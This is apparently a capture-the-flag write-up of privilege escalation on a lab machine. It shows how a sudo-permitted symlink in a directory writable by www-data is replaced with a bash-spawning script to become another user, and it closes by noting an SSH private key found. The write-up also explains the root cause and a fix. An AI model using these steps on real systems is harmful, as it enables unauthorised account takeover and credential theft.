6 www-data > bytevsbyte

www-data@bottleneck:/tmp$ sudo -u bytevsbyte "/var/www/html/web_utils/clear_logs"

# tried making an rm replacement using msfvenom - didn't work

www-data@bottleneck:/tmp$ cat "/var/www/html/web_utils/clear_logs"
#!/bin/bash
rm -f /var/log/soc/intrusion_*
www-data@bottleneck:/tmp$ ls -la /opt
total 16
drwxr-xr-x  2 root       root       4096 Sep 27  2019 .
drwxr-xr-x 20 root       root       4096 Feb 20  2020 ..
-rwxr--r--  1 bytevsbyte bytevsbyte   43 Sep 27  2019 clear_logs.sh
-rw-r--r--  1 root       root        359 Sep 27  2019 ids_strong_bvb.py
# cannot write / modify here

www-data@bottleneck:/tmp$ ls -la /var/www/html/web_utils/
total 8
drwxrwxr-x 2 www-data www-data 4096 Mar  2  2020 .
drwxr-xr-x 7 root     root     4096 Sep 26  2019 ..
lrwxrwxrwx 1 root     root       18 Mar  2  2020 clear_logs -> /opt/clear_logs.sh
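# can write and modify here: the directory is owned by www-data (drwxrwxr-x), so although the clear_logs symlink itself is root-owned, www-data can delete or replace the directory entry - we can change the symlink
# root cause: sudo is allowed to run, as bytevsbyte, a path that lives in a directory the calling user can write to (the sudoers rule itself is not shown here); the fix is to have the rule reference a root-owned path in a directory www-data cannot modify, e.g. the /opt/clear_logs.sh target directly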

# method 1 - change symlink 
echo -e "/bin/bash\n/bin/bash" > kashz.sh
ln -fs kashz.sh /var/www/html/web_utils/clear_logs

# method 2 - delete the symlink & create clear_logs directly, as we have full control over the directory
rm clear_logs
echo -e "/bin/bash\n/bin/bash" > clear_logs
chmod 777 clear_logs

sudo -u bytevsbyte "/var/www/html/web_utils/clear_logs"

bytevsbyte@bottleneck:~/html/web_utils$ whoami;id;hostname
bytevsbyte
uid=1000(bytevsbyte) gid=1000(bytevsbyte) groups=1000(bytevsbyte),4(adm),24(cdrom),30(dip),46(plugdev),1001(tester)
bottleneck

id_rsa (SSH private key) found in /home/bytevsbyte/.ssh/
